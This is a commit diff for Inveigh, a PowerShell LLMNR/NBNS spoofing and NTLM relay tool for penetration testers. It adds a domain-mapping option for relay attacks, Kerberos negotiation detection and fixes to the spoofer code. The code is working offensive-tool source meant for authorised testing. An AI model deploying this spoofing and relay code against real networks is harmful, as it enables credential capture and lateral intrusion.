diff options
| author | Kevin Robertson <Kevin-Robertson@users.noreply.github.com> | 2019-01-30 23:05:50 -0500 |
|---|---|---|
| committer | Kevin Robertson <Kevin-Robertson@users.noreply.github.com> | 2019-01-30 23:05:50 -0500 |
| commit | 2bcdf493e87cd44cf5ad7bf30f45d97b3ac5a638 (patch) | |
| tree | 88232e93dcd4670eaaf41a3dfc8c17e0c84747b6 | |
| parent | dfd419e7669693f9d8a47b00172e84e558feee35 (diff) | |
| download | Inveigh-2bcdf493e87cd44cf5ad7bf30f45d97b3ac5a638.tar.gz Inveigh-2bcdf493e87cd44cf5ad7bf30f45d97b3ac5a638.zip | |
Kerberos detection and bug fixes
Added indicator for when SMB auth negotiates to Kerberos. Bug fixes.
| -rw-r--r-- | Inveigh-Relay.ps1 | 62 | ||||
| -rw-r--r-- | Inveigh.ps1 | 33 | ||||
| -rw-r--r-- | README.md | 6 |
3 files changed, 74 insertions, 27 deletions
diff --git a/Inveigh-Relay.ps1 b/Inveigh-Relay.ps1 index 88dbc26..d4ca2cd 100644 --- a/Inveigh-Relay.ps1 +++ b/Inveigh-Relay.ps1 @@ -36,6 +36,10 @@ displaying full capture lists when running through a shell that does not have ac Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. +.PARAMETER DomainMapping +Array to map one netBIOS domain to one DNS domain. Needed when attacking a domain from a non-domain +attached system with data imported from BloodHound. + .PARAMETER Enumerate Default = All: (All/Group/NetSession/Share/User) The action that will be used for the 'Enumerate' attack. @@ -214,6 +218,7 @@ param [parameter(Mandatory=$false)][ValidateSet("All","NetSession","Share","User","Group")][String]$Enumerate = "All", [parameter(Mandatory=$false)][ValidateSet("Random","Strict")][String]$TargetMode = "Random", [parameter(Mandatory=$false)][String]$EnumerateGroup = "Administrators", + [parameter(Mandatory=$false)][Array]$DomainMapping = "", [parameter(Mandatory=$false)][Array]$Target = "", [parameter(Mandatory=$false)][Array]$TargetExclude = "", [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox", @@ -279,7 +284,7 @@ if($inveigh.relay_running) throw } -$inveigh_version = "1.4" +$inveigh_version = "1.4.1" if(!$target -and !$inveigh.enumerate) { @@ -304,10 +309,21 @@ if($ProxyIP -eq '0.0.0.0') if($Attack -contains 'Execute' -and !$Command) { - Write-Output "[-] -Command requiried with -Attack Execute" + Write-Output "[-] -Command required with -Attack Execute" throw } +if($DomainMapping) +{ + + if($DomainMapping.Count -ne 2 -or $DomainMapping[0] -like "*.*" -or $DomainMapping[1] -notlike "*.*") + { + Write-Output "[-] -DomainMapping format is incorrect" + throw + } + +} + if(!$FileOutputDirectory) { $output_directory = $PWD.Path @@ -641,6 +657,13 @@ if($Proxy -eq 'Y') } +if($DomainMapping) +{ + $inveigh.output_queue.Add("[+] Domain Mapping = " + ($DomainMapping -join ",")) > $null + $inveigh.netBIOS_domain = $DomainMapping[0] + $inveigh.DNS_domain = $DomainMapping[1] +} + $inveigh.output_queue.Add("[+] Relay Attack = " + ($Attack -join ",")) > $null # math taken from https://gallery.technet.microsoft.com/scriptcenter/List-the-IP-addresses-in-a-60c5bb6b @@ -1028,14 +1051,32 @@ while($inveigh.output_queue.Count -gt 0) } -$inveigh.status_output = $false -$inveigh.netBIOS_domain = (Get-ChildItem -path env:userdomain).Value -$inveigh.computer_name = (Get-ChildItem -path env:computername).Value +if(!$inveigh.netBIOS_domain) +{ + $inveigh.status_output = $false + $inveigh.netBIOS_domain = (Get-ChildItem -path env:userdomain).Value + $inveigh.computer_name = (Get-ChildItem -path env:computername).Value -try + try + { + $inveigh.DNS_domain = ((Get-ChildItem -path env:userdnsdomain -ErrorAction 'SilentlyContinue').Value).ToLower() + $inveigh.DNS_computer_name = ($inveigh.computer_name + "." + $inveigh.DNS_domain).ToLower() + + if(!$inveigh.domain_mapping_table.ContainsKey($inveigh.netBIOS_domain)) + { + $inveigh.domain_mapping_table.Add($inveigh.netBIOS_domain,$inveigh.DNS_domain) + } + + } + catch + { + $inveigh.DNS_domain = $inveigh.netBIOS_domain + $inveigh.DNS_computer_name = $inveigh.computer_name + } + +} +else { - $inveigh.DNS_domain = ((Get-ChildItem -path env:userdnsdomain -ErrorAction 'SilentlyContinue').Value).ToLower() - $inveigh.DNS_computer_name = ($inveigh.computer_name + "." + $inveigh.DNS_domain).ToLower() if(!$inveigh.domain_mapping_table.ContainsKey($inveigh.netBIOS_domain)) { @@ -1043,11 +1084,6 @@ try } } -catch -{ - $inveigh.DNS_domain = $inveigh.netBIOS_domain - $inveigh.DNS_computer_name = $inveigh.computer_name -} if($inveigh.enumerate) { diff --git a/Inveigh.ps1 b/Inveigh.ps1 index cbeaf43..0deb8a7 100644 --- a/Inveigh.ps1 +++ b/Inveigh.ps1 @@ -448,7 +448,7 @@ if($invalid_parameter) throw } -$inveigh_version = "1.4" +$inveigh_version = "1.4.1" if(!$IP) { @@ -655,6 +655,7 @@ if($StartupChecks -eq 'Y') if($LLMNR -eq 'Y' -and !$elevated_privilege) { $LLMNR_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5355 " + $LLMNR_port_check = $false } if($mDNS -eq 'Y' -and !$elevated_privilege) @@ -802,11 +803,6 @@ catch $inveigh.DNS_computer_name = $inveigh.computer_name } -if($inveigh.relay_running) -{ - # $inveigh.output_pause = $true -} - #endregion #region begin startup messages $inveigh.output_queue.Add("[*] Inveigh $inveigh_version started at $(Get-Date -format s)") > $null @@ -2543,6 +2539,13 @@ $SMB_NTLM_functions_scriptblock = $inveigh.SMB_session_table.Add($Session,"") } + $SMB_index = $payload_converted.IndexOf("2A864886F712010202") + + if($SMB_index -gt 0 -and $SourceIP -ne $IP) + { + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] SMB($Port) authentication method is Kerberos for $Session") > $null + } + } function Get-SMBNTLMChallenge @@ -3445,6 +3448,7 @@ $sniffer_scriptblock = $TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4 $binary_reader.ReadBytes(7) > $null $payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length)) + switch ($destination_port) { @@ -3683,6 +3687,7 @@ $sniffer_scriptblock = $NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point) > $null $NBNS_send_socket.Close() $NBNS_response_message = "[response sent]" + $connection_check_IP = $source_IP } else { @@ -3765,6 +3770,7 @@ $sniffer_scriptblock = $send_socket.SendTo($mDNS_response_packet,$destination_point) > $null $send_socket.Close() $mDNS_response_message = "[response sent]" + $connection_check_IP = $source_IP } else { @@ -3932,6 +3938,7 @@ $sniffer_scriptblock = $LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point) > $null $LLMNR_send_socket.Close() $LLMNR_response_message = "[response sent]" + $connection_check_IP = $source_IP } else { @@ -3998,10 +4005,10 @@ $sniffer_scriptblock = # Unprivileged LLMNR Spoofer ScriptBlock $LLMNR_spoofer_scriptblock = { - param ($Inspect,$LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL) + param ($Inspect,$LLMNR_response_message,$LLMNRTTL,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$SpooferNonprintable) $LLMNR_running = $true - $LLMNR_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5355) + $LLMNR_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Any,5355) try { @@ -4029,7 +4036,7 @@ $LLMNR_spoofer_scriptblock = catch { $LLMNR_UDP_client.Close() - $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355 $LLMNR_multicast_group = [IPAddress]"224.0.0.252" $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 @@ -4069,7 +4076,7 @@ $LLMNR_spoofer_scriptblock = $LLMNR_UDP_client.Connect($LLMNR_destination_endpoint) $LLMNR_UDP_client.Send($LLMNR_response_packet,$LLMNR_response_packet.Length) $LLMNR_UDP_client.Close() - $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355 $LLMNR_multicast_group = [IPAddress]"224.0.0.252" $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 @@ -4816,9 +4823,9 @@ function LLMNRSpoofer $LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace $LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null $LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument($Inspect).AddArgument( - $LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument( - $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( - $SpooferNonprintable).AddArgument($LLMNRTTL) > $null + $LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($SpooferIP).AddArgument( + $SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument( + $SpooferIPsIgnore).AddArgument($SpooferNonprintable) > $null $LLMNR_spoofer_powershell.BeginInvoke() > $null } @@ -2,8 +2,11 @@ Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. +## 1.4 Release Blog +* https://blog.netspi.com/inveigh-whats-new-in-version-1-4/ + ## Wiki -* https://github.com/Kevin-Robertson/Inveigh/wiki +* https://github.com/SecureAuthCorp/impacket ## Included In * PowerShell Empire - https://github.com/PowerShellEmpire/Empire @@ -12,6 +15,7 @@ Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle too * PowerUpSQL - https://github.com/NetSPI/PowerUpSQL * PoshC2 - https://github.com/nettitude/PoshC2 * pupy - https://github.com/n1nj4sec/pupy +* Merlin - https://github.com/Ne0nd0g/merlin ## Special Thanks * Anyone that posted .NET packet sniffing examples |